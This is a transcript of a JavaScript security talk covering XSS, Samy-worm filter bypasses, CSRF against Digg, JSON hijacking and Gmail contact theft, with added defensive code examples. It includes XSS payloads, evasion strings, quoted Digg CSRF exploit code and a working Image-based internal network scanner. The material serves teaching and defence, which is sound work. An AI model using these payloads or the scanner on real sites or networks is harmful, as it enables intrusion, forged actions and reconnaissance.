JavaScript Security
 

JavaScript, as it is today, is an insecure language. We need to understand its shortcomings to improve the security of our applications and protect our users.



    Presentation Transcript

    • JavaScript Security, Jason Harwig
    • "How dangerous could this silly little toy scripting language running inside a browser be?" Jeff Atwood, codinghorror.com, stackoverflow.com
    • "JavaScript's biggest weakness is that it is not secure." Douglas Crockford
    • "...nine out of 10 websites still have serious vulnerabilities... (XSS) as the top vulnerability class" WhiteHat Security Website Security Statistic Report
    • OWASP Top 10 2007
      1. XSS
      2. Injection Flaws
      3. File Exec
      4. Direct Object Reference
      5. CSRF
      6. Information Leakage
      7. Broken Auth
      8. Insecure Crypto
      9. Insecure Communications
      10. Failure to restrict URL access
    • browser limitations
    • javascript IO • Ajax • Image • iFrame • Source script • Bridge to flash, Java applets
    • (each of the IO slides below carries the same diagram: NIC / Server / Google)
    • Ajax: var xhr = new XMLHttpRequest(); xhr.open(...) * get or post
    • Image: var image = new Image(); image.src = url; * can detect connection success/failure * get requests only | onload | onerror
    • iFrame: f = document.createElement('iframe'); f.src = url; document.body.appendChild(f); * contents readable only if same domain * get requests only
    • Source script: s = document.createElement('script'); s.type = 'text/javascript'; s.src = url; document.body.appendChild(s); * if JSON returned * get requests only
    • Form: f = document.createElement('form'); f.method = 'post'; ... f.submit(); * get or post
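The slides above list what a page can observe when it fires a request at an arbitrary host: for an Image, only onload or onerror, and when they fire. The following is an added example (not code from the deck) showing how those two events plus a timer become a host probe, which is also the mechanism the later "internal network penetration" slide relies on. The verdict rules are the usual timing heuristic and are an assumption of this example, as are the fake hosts used to run it offline.

```javascript
// Added example, not code from the slides: host probing with an Image object,
// the cross-origin GET the "javascript IO" slides describe and the mechanism
// behind the later "internal network penetration" slide. The page only sees
// onload/onerror, so the verdicts are the usual timing heuristic, stated here
// as an assumption: onload = an image came back, a fast onerror = connection
// refused, a slow onerror = something answered that is not an image, nothing
// before the timeout = filtered or no host.

function classifyProbe(event, elapsedMs, fastErrorMs) {
  if (event === 'onload') return 'open: served an image';
  if (event === 'timeout') return 'filtered: no answer before timeout';
  if (event === 'onerror' && elapsedMs < fastErrorMs) return 'closed: connection refused';
  if (event === 'onerror') return 'open: answered with a non-image';
  throw new Error('unknown probe event: ' + event);
}

// deps lets the same function run in a browser (defaults: the real Image,
// setTimeout and Date) and offline in Node with the fakes further down.
function probeWithImage(url, deps) {
  const d = deps || {};
  const makeImage = d.makeImage || (() => new Image());
  const schedule = d.schedule || ((fn, ms) => setTimeout(fn, ms));
  const now = d.now || (() => Date.now());
  const timeoutMs = d.timeoutMs || 1500;
  const fastErrorMs = d.fastErrorMs || 100;

  return new Promise(resolve => {
    const img = makeImage();
    const started = now();
    let settled = false;
    const finish = event => {
      if (settled) return;                 // ignore a late onerror after the timeout
      settled = true;
      img.onload = img.onerror = null;
      const elapsedMs = now() - started;
      resolve({ url, event, elapsedMs, verdict: classifyProbe(event, elapsedMs, fastErrorMs) });
    };
    img.onload = () => finish('onload');
    img.onerror = () => finish('onerror');
    schedule(() => finish('timeout'), timeoutMs);
    img.src = url;   // the GET leaves here; same-origin policy hides the body, not the outcome
  });
}

// Probe one address at a time: browsers cap parallel connections per host and
// a queue would inflate the timings the classifier relies on.
async function scanHosts(urls, deps) {
  const results = [];
  for (const url of urls) results.push(await probeWithImage(url, deps));
  return results;
}

// Constructed fake network for running this offline. table maps a URL to the
// event the fake Image fires and how many fake milliseconds it takes; a URL
// missing from the table never answers. The addresses are made up.
function fakeNetwork(table, timeoutMs) {
  let clock = 0;
  let timer = null;
  return {
    timeoutMs,
    fastErrorMs: 100,
    now: () => clock,
    schedule: (fn, ms) => { timer = { fn, ms }; },
    makeImage: () => {
      const img = {};
      Object.defineProperty(img, 'src', {
        set(url) {
          const entry = table[url];
          if (!entry) { clock += timer.ms; timer.fn(); return; }
          clock += entry.delayMs;
          if (entry.event === 'onload') img.onload(); else img.onerror();
        },
      });
      return img;
    },
  };
}
```

In a browser, `scanHosts(['http://192.168.1.1/', 'http://192.168.1.1/logo.gif'])` with no second argument uses the real Image object. The thresholds (100 ms for "refused", 1500 ms for "no answer") are guesses that a real scan would calibrate against a known-open and a known-closed port first.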
    • white hat • Mashup / Aggregate content • SSO Solutions • Protect users / application integrity
    • black hat • XSS • CSRF • JSON hi-jacking • Cookie session hijacking • Internal network scanning • History checking
    • cross-site scripting
    • Browser IFrame same origin policy
    • user input escape it!
    • XSS Flavors • Type 0 - DOM • Type 1 - Non-Persistent • Type 2 - Persistent
    • type 0 var p = location.search.substring(1); document.body.innerHTML = p;
    • Type 1 Search: <script>alert('xss');</script>
    • Type 2 Please enter username: <script>alert('xss');</script>
    • Your Username: <script>alert('xss');</script>, rendered with <c:out value="${var}" escapeXml="true"/>
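What "escape it!" amounts to for the three flavors above, as an added example rather than code from the deck: an `escapeHtml` that does what JSTL's `<c:out escapeXml="true"/>` does, applied at output time for the reflected and persistent cases, and the choice of DOM sink for the type 0 case. The page and field names are invented for the example.

```javascript
// Added example, not the deck's code. escapeHtml does the job of
// <c:out escapeXml="true">: the five characters that can change HTML
// structure become entities, so user input is displayed, never parsed.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  // one pass with a character class so & is never escaped twice
  return String(value).replace(/[&<>"']/g, c => HTML_ESCAPES[c]);
}

// Type 1 (reflected): the search term comes straight back from the request and
// lands in two contexts, a quoted attribute and element content. Escaping the
// quote characters is what keeps the attribute from being closed early.
function renderSearchPage(term, hits) {
  const items = hits.map(h => '<li>' + escapeHtml(h) + '</li>').join('');
  return '<form><input name="q" value="' + escapeHtml(term) + '"></form>' +
         '<p>Results for ' + escapeHtml(term) + ':</p><ul>' + items + '</ul>';
}

// Type 2 (persistent): the username was stored earlier and is rendered on every
// later visit, so escaping has to happen at output, not when it was saved.
function renderGreeting(username) {
  return 'Your Username: ' + escapeHtml(username);
}

// Type 0 (DOM): the page's own script copies a URL parameter into the page.
// The fix is the sink, not an entity encoder: textContent stores text and never
// parses it, innerHTML parses whatever it is given. doc is passed in so this
// runs outside a browser; in a page it is simply `document`.
function showParam(doc, search, name) {
  const value = new URLSearchParams(search).get(name) || '';
  doc.body.textContent = value;   // doc.body.innerHTML = value would be the type 0 bug
  return value;
}
```

`&#39;` for the single quote is deliberate: `&apos;` is an XML entity that older HTML parsers do not know, and an unescaped `'` is enough to break out of a single-quoted attribute.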
    • html filtering
    • samy is my hero from http://fast.info/myspace/
    • [chart: Samy worm friend requests over time, 0 to 7,000, ticks at 12:34pm, 1:30am, 8:35am, 9:30am, 10:30am, 1:30pm]
    • tag/attribute whitelist <div style="background:url( 'javascript:alert('xss')' )">
    • 'javascript' stripped <div style="background:url( 'java\nscript:alert('xss')' )">
    • " stripped String.fromCharCode(34);
    • innerHTML stripped eval('document.body.inne' + 'rHTML');
    • onreadystatechange stripped eval('xmlhttp.onread' + 'ystatechange = callback');
    • to be continued..
    • alternatives to escaping?
    • google caja / ADsafe
    • attack vectors to prevent?
    • code evaluation eval('alert(document.cookie)'); (new Function('alert(document.cookie)'))();
    • code eval continued <iframe src="java&#65533;script:alert('xss')"> </iframe>
    • polluting global objects try { throw EvilArrayFunction; } catch (Array) { }
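The filter bypasses on the Samy slides and the `javascript:` URL on the "code eval continued" slide have the same root cause: the filter looks for a literal string, while the browser decodes character references and discards whitespace before it reads a URL scheme. The following is an added example, not the deck's code, that reproduces the broken strip filter beside an allowlist check on the URL's scheme after the browser's own normalization; the set of allowed schemes is an assumption for the example.

```javascript
// Added example, not the deck's code. naiveStrip is the kind of filter the
// slides show being bypassed. isAllowedUrl is what a sanitizer should run on
// every href/src it keeps: decode, normalize the way the browser does, then
// accept only known-safe schemes instead of deleting known-bad words.

function naiveStrip(html) {
  return html.replace(/javascript|innerHTML|onreadystatechange|"/g, '');
}

// Decode numeric references and the few named ones that matter in an
// attribute value. Browsers do this before parsing the URL, so
// &#106;avascript: is javascript: by the time the click happens.
function decodeAttributeValue(raw) {
  const named = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'", tab: '\t', newline: '\n' };
  const cp = n => (n > 0x10ffff ? '\uFFFD' : String.fromCodePoint(n));
  return raw
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => cp(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => cp(parseInt(dec, 10)))
    .replace(/&(lt|gt|amp|quot|apos|tab|newline);/gi, (_, n) => named[n.toLowerCase()]);
}

// The URL parser strips leading and trailing C0 controls and spaces, and drops
// tab, LF and CR wherever they appear; that is why java<newline>script: worked.
function normalizeUrl(raw) {
  return decodeAttributeValue(raw)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
}

const ALLOWED_SCHEMES = ['http', 'https', 'mailto'];   // assumption for this example

// true for relative URLs and for allowed schemes; javascript:, data:,
// vbscript: and anything unknown are rejected rather than "cleaned".
function isAllowedUrl(raw) {
  const url = normalizeUrl(raw);
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (!m) return true;                                   // no scheme: relative link
  return ALLOWED_SCHEMES.includes(m[1].toLowerCase());
}
```

Two things the check does not try to do, on purpose: it never rewrites a rejected URL into a "safe" one, and it does not parse CSS. The Samy payload sits inside a `style` attribute's `url()`, and an allowlist sanitizer simply does not keep `style` at all.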
    • xss lessons • Escape XML
    • cross site request forgery the new kid
    • NIC Server Google
    • Digg.com • “digg” a story while logged in • Cookie authentication • known url, parameters
    • digg exploit code
      mf = window.frames["myframe"];
      html = '<form name="diggform" action="http://digg.com/diginfull" method="post">';
      html = html+'<input type="text" name="id" value="367034"/>';
      html = html+'<input type="text" name="orderchange" value="2"/>';
      html = html+'<input type="text" name="category" value="0"/>';
      html = html+'<input type="text" name="page" value="0"/>';
      html = html+'<input type="text" name="t" value="undefined"/>';
      html = html+'<input type="text" name="row" value="1"/>';
      html = html+'</form>';
      mf.document.body.innerHTML = html;
      mf.document.diggform.submit();
      from http://4diggers.blogspot.com/
    • Fixes? • Referer checking? • quick cookie expiration? • post?
    • solved session.setAttribute("token", token); <input type="hidden" name="token" value="${token}"/>
    • double submit cookie
    • digg link <a href="javascript:dig([num],[id],[digCheck])">digg it</a>
    • digg submit js new Ajax.Request("/diginfull", { "method": "post", "parameters": "id=" + itemd + "&row=" + row + "&digcheck=" + digcheck + "&type=" + type + "&loc=" + pagetype });
    • no diggcheck, no digg
    • digg.com • Added random hash as post parameter • server verifies request
    • myspace • used hash in post to add friends • XSS vulnerable so the hash could be retrieved
    • HDIV • HTTP Data Integrity Validator
    • rsnake joins twitter
    • crossdomain.xml
      <?xml version="1.0" encoding="UTF-8"?>
      <cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
        <allow-access-from domain="*.twitter.com" />
        <site-control permitted-cross-domain-policies="master-only"/>
        <allow-http-request-headers-from domain="*.twitter.com" headers="*" secure="true"/>
      </cross-domain-policy>
    • http://www.yourminis.com/search_minis.aspx?q=XSS
    • stealing your gmail contacts
    • google contacts url contacts?out=js&callback=google
    • responseText google ({ Success: true, Errors: [], Body: { Contacts: [ { id, email, etc. } ] } });
    • google’s solution? • responseXml
    • lessons • Protect high value forms • CANNOT be stopped if site is vulnerable to XSS
    • json hijacking
    • new Ajax.Request('secretStuff', { onSuccess: doWork }); // server responds with [ { sensitive_info: '...' }, { sensitive_info: '...' } ]
    • So how do I do it? • Override Array • Source script
    • demo
    • solved /*-secure- [ { sensitive_info: '...' }, { sensitive_info: '...' } ] */
    • “solved” continued • protect JSON services behind post
    • lessons • Many experts recommend JSON services shouldn’t serve sensitive data • use secure comment • responseXml as alternative
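Both the Gmail contacts slides (a JSONP endpoint that calls whatever function name the caller supplies) and the JSON hijacking slides (a bare array evaluated by a script tag) come down to one fact: a `<script src>` runs the response as a program. The following is an added example, not Google's or the deck's code, that shows the `/*-secure-` comment wrapper from the "solved" slide, an imitation of what the script tag does with each kind of response, and the detail the slide leaves out: a value containing `*/` would close the comment early unless the wrapper escapes it. The data is constructed for the example.

```javascript
// Added example, not Google's or the deck's code. wrapSecure/unwrapSecure
// implement the secure-comment scheme from the slides; evalAsScriptTag runs a
// response the way <script src=...> does, as a whole program.

const SECURE_PREFIX = '/*-secure-\n';
const SECURE_SUFFIX = '\n*/';

function wrapSecure(value) {
  // "*/" can only occur inside a JSON string, and "*\/" is the same string to
  // JSON.parse, so this escape keeps the comment closed until the suffix.
  const json = JSON.stringify(value).replace(/\*\//g, '*\\/');
  return SECURE_PREFIX + json + SECURE_SUFFIX;
}

// The XHR client strips the wrapper it expects; anything else is refused, so a
// response that lost its wrapper (or never had one) is not parsed by accident.
function unwrapSecure(text) {
  if (!text.startsWith(SECURE_PREFIX) || !text.endsWith(SECURE_SUFFIX)) {
    throw new Error('response is not secure-comment wrapped');
  }
  return JSON.parse(text.slice(SECURE_PREFIX.length, text.length - SECURE_SUFFIX.length));
}

// A JSONP-style endpoint (contacts?out=js&callback=google on the slide): the
// data is handed to a function whose name the requester chose. The attacker's
// page defines that function. Shown only to contrast with wrapSecure.
function jsonpResponse(callbackName, value) {
  return callbackName + '(' + JSON.stringify(value) + ');';
}

// Evaluate text as a whole program, like a script tag does, with the given
// globals in scope, and return the program's completion value. A bare array
// literal is a program whose value is the array; a comment has no value.
// (An object literal at the top level parses as a block, which is why the
// classic hijack targets arrays and JSONP callbacks.)
function evalAsScriptTag(text, globals) {
  const names = Object.keys(globals || {});
  const run = new Function(...names, 'return eval(' + JSON.stringify(text) + ');');
  return run(...names.map(n => globals[n]));
}
```

The wrapper only protects data fetched with XHR by same-origin code, which is the "many experts recommend JSON services shouldn't serve sensitive data" lesson restated: the wrapper makes the script-tag route yield nothing, it does not make the endpoint itself any less reachable.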
    • Session hijacking
    • demo
    • internal network penetration
    • history hijack
    • demo
    • resources
      "Security Now! Podcast" twit.tv/sn
      "Fortify" fortifysoftware.com/security-resources/
      "WhiteHat Security" whitehatsec.com
      "XSS Generator" ha.ckers.org/xss.html
      "Jeremiah Grossman Blog" jeremiahgrossman.blogspot.com
      "Samy is my Hero" fast.info/myspace
      "Digg Hack" 4diggers.blogspot.com
      "HDIV" hdiv.org
    • twitter: jharwig | jason.harwig@nearinfinity.com | nearinfinity.com/blogs | careers@nearinfinity.com